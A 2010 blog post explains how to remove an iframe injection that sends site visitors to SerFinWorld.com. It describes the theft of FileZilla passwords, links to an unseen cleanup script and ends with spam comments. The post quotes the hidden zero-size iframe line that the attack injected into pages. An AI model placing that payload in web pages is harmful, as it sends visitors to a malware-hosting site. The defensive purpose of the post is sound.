SerFinWorld.com Server Virus Removal

This post was written by Yon on August 17, 2010
Posted Under: Marketing,Musings

I was recently hit with the IFRAME virus that sends my visitors to SerFinWorld.com/spm1 -> Don’t go to that site, at the time of this writing it has a Java based Virus that will attempt to hijack your passwords from Filezilla, and then upload them to some remote host so that they can hijack your webserver.  When they hijack your webserver they upload and execute a simple script that will insert their <iframe></iframe> tags into all of your files named index.*

If this has happened to you, you can see that it shows up as a line in your files named index.* – usually this line comes immediately after the start of the <body> tag.  Otherwise, it can be the last line before or after the php closing tag:  ?>

If this has happened to you.  Here are some steps to take.

1) change your webhosting password immediately.
2) stop using filezilla until this security risk has been eliminated.
3) I have created a quick script that you can use to remove these lines from your website, the link is below
 http://yoncole.com/rmSerFinWorld/rmSerFinWorld.sh
This script is offered with no guarantees and I assume no liability for it’s use.
4) to use it you’ll need to download it, upload it to your server, telnet/ssh into your server and excute it  or write a quick php page that can execute it.  (You might need to talk to tech support for your webserver if you’re not sure how to do all that.  The script is pretty sweet and tech support would probably be happy that you made it available to them.)

The sample lines of code that would show up, that would be removed by this script are:
<html><body><iframe src=’http://SerFinWorld.com/spm1/’ width=’0′ height=’0′ frameborder=’0′></iframe></body></html>
or simply:
<iframe src=’http://SerFinWorld.com/spm1/’ width=’0′ height=’0′ frameborder=’0′></iframe>

Good luck!
I hope this has helped you remove the SerFinWorld.com/spm1 Iframe virus.
Protect your passwords, and don’t store them where hackers can find them.

If you would like to donate, take a look at http://www.onlybusinesscan.com/d/?q=transformation

Be Sociable, Share!

Reader Comments

hello!This was a really quality topic!
I come from itlay, I was luck to seek your website in yahoo
Also I get much in your blog really thank your very much i will come again

#1 
Written By bet365 on November 13th, 2010 @ 9:05 am

I have been scouting temporarly for just a sound articles or blog posts to do with this kind of idea . Checking in Bing I finally stumbled upon this blog. After reading this information I am seriously happy to imply that I get a wonderful feeling I discovered precisely what I was ready for. I will make certain to don’t forget this site and check it out consistently.

#2 
Written By Huge Bates on November 13th, 2010 @ 2:30 pm

Great writing! I want to see a follow up on this topic!!

acupuncture courses

#3 
Written By Jesus Smart on January 7th, 2011 @ 2:03 am

Add a Comment

You must be logged in to post a comment.